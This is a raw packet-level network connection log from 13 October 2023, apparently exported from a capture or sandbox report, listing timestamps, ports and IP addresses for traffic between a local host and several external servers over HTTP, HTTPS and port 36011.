Oct 13, 2023 15:21:02.323694944 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.323749065 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.330286980 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.330385923 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.330467939 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.336355925 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.336528063 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.336606979 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.345654011 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.345751047 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.345885038 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.348104954 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.348186970 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.348344088 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.354643106 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.354707956 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.354819059 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.360299110 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.360384941 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.360483885 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.366247892 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.366386890 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.366415977 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.382405043 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.382472038 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.382572889 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.382997990 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.383033991 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.383048058 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.388204098 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.388371944 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.388436079 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.394371033 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.394427061 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.394462109 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.399641991 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.399696112 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.399789095 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.405455112 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.405524015 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.405580997 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.411555052 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.411616087 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.411679983 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.416301966 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.416341066 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.416382074 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.421745062 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.421816111 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.421818972 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.427145958 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.427206039 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.427333117 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.432517052 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.432581902 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.432708979 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.437813997 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.437880993 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.437963963 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.443252087 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.443290949 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.443413973 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.448517084 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.448580027 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.448717117 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.453738928 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.453952074 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.453958035 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.458895922 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.458965063 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.459069014 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.465394020 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.465451002 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.465537071 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.469409943 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.469475031 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.469594955 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.477504969 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.477555037 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.477765083 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.479573011 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.479640007 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.479685068 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.484580040 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.484627962 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.484769106 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.494153976 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.494208097 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.494275093 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.500158072 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.500195980 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.500211000 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.502604008 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.502675056 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.502707958 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.507491112 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.507550955 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.507612944 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.512409925 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.512463093 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.512612104 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.517263889 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.517318964 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.517391920 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.521795034 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:02.522012949 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.522049904 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.522075891 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.526798010 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.526834965 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.526858091 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.532016039 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.532073021 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.532140970 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.537535906 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.537592888 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.537725925 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.540911913 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.540977001 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.541042089 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.545700073 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.545737028 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.545769930 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.550149918 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.550188065 CEST	80	49724	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:02.550209045 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.577805042 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:02.615952015 CEST	49724	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:02.673346996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:02.673346996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:02.897593975 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:03.025474072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:03.043009996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:03.053031921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:03.053031921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:03.134347916 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:03.404709101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:03.423563004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:03.525144100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:04.160166979 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.160196066 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:04.160264969 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.176593065 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.176611900 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:04.477576017 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:04.477605104 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:04.478009939 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:04.480307102 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:04.480319023 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:04.510063887 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:04.510130882 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.516335964 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.516345978 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:04.516578913 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:04.516633987 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.518351078 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:04.558454037 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:04.985982895 CEST	49731	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:05.266793013 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:05.266911030 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:05.268290043 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:05.268296003 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:05.268790960 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:05.277568102 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:05.288006067 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:05.288089037 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:05.288114071 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:05.288139105 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:05.288202047 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:05.288403988 CEST	49729	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:05.288412094 CEST	443	49729	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:05.322444916 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:05.354214907 CEST	80	49731	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:05.354696035 CEST	49731	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:05.354963064 CEST	49731	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:05.723088026 CEST	80	49731	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:05.773786068 CEST	80	49731	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:05.773873091 CEST	49731	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:06.039163113 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.039190054 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:06.039390087 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.058924913 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.058938026 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:06.059528112 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.059557915 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.059613943 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.059628963 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.134366035 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.134387970 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.321944952 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.393779993 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:06.393958092 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.399353981 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.399373055 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:06.399631977 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:06.399693012 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.401943922 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:06.446445942 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:06.459486008 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.459520102 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.459598064 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.459794044 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.459809065 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.459813118 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.459841967 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.459849119 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.459870100 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.459882975 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.459897041 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.460726023 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.460746050 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.460788965 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.460833073 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.460833073 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.460833073 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.460844994 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.508907080 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.508936882 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.509083033 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.509083033 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.509098053 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.634330034 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.634340048 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.700735092 CEST	49733	80	192.168.2.5	91.106.207.50
Oct 13, 2023 15:21:06.782294035 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.867134094 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867172003 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867211103 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867218971 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.867245913 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.867265940 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.867397070 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867621899 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867640972 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867675066 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867747068 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.867747068 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.867753983 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.867800951 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.868660927 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.868681908 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.868731022 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.868747950 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.868747950 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.868753910 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.868843079 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.869082928 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.869101048 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.869194031 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.869194031 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.869199038 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.875900984 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.875966072 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.876013041 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.876019955 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.876045942 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.876461029 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.876482010 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.876557112 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.876557112 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.876564026 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.931411982 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:06.931421041 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:06.978449106 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.062788963 CEST	80	49733	91.106.207.50	192.168.2.5
Oct 13, 2023 15:21:07.062900066 CEST	49733	80	192.168.2.5	91.106.207.50
Oct 13, 2023 15:21:07.063165903 CEST	49733	80	192.168.2.5	91.106.207.50
Oct 13, 2023 15:21:07.174071074 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:07.174237013 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:07.174357891 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:07.174357891 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:07.174643040 CEST	49732	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:07.174663067 CEST	443	49732	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:07.274807930 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.274857044 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.274893045 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.274910927 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.275006056 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.275043011 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275257111 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275275946 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275294065 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275424957 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.275424957 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.275437117 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275827885 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275847912 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275876045 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275898933 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.275904894 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.275942087 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.275942087 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.276401043 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.276420116 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.276489973 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.276489973 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.276498079 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.276995897 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.277048111 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.277144909 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.277144909 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.277149916 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.281831026 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.281985044 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.281991005 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.282918930 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.282998085 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.283003092 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.337927103 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.426270008 CEST	80	49733	91.106.207.50	192.168.2.5
Oct 13, 2023 15:21:07.607180119 CEST	80	49733	91.106.207.50	192.168.2.5
Oct 13, 2023 15:21:07.607228994 CEST	80	49733	91.106.207.50	192.168.2.5
Oct 13, 2023 15:21:07.607290030 CEST	49733	80	192.168.2.5	91.106.207.50
Oct 13, 2023 15:21:07.607319117 CEST	49733	80	192.168.2.5	91.106.207.50
Oct 13, 2023 15:21:07.670027971 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670044899 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670078039 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670166016 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.670217991 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.670223951 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670284986 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670291901 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670362949 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.670370102 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670737982 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670743942 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.670918941 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.670926094 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.671302080 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.671320915 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.671379089 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.671385050 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.671401024 CEST	49730	443	192.168.2.5	213.6.54.58
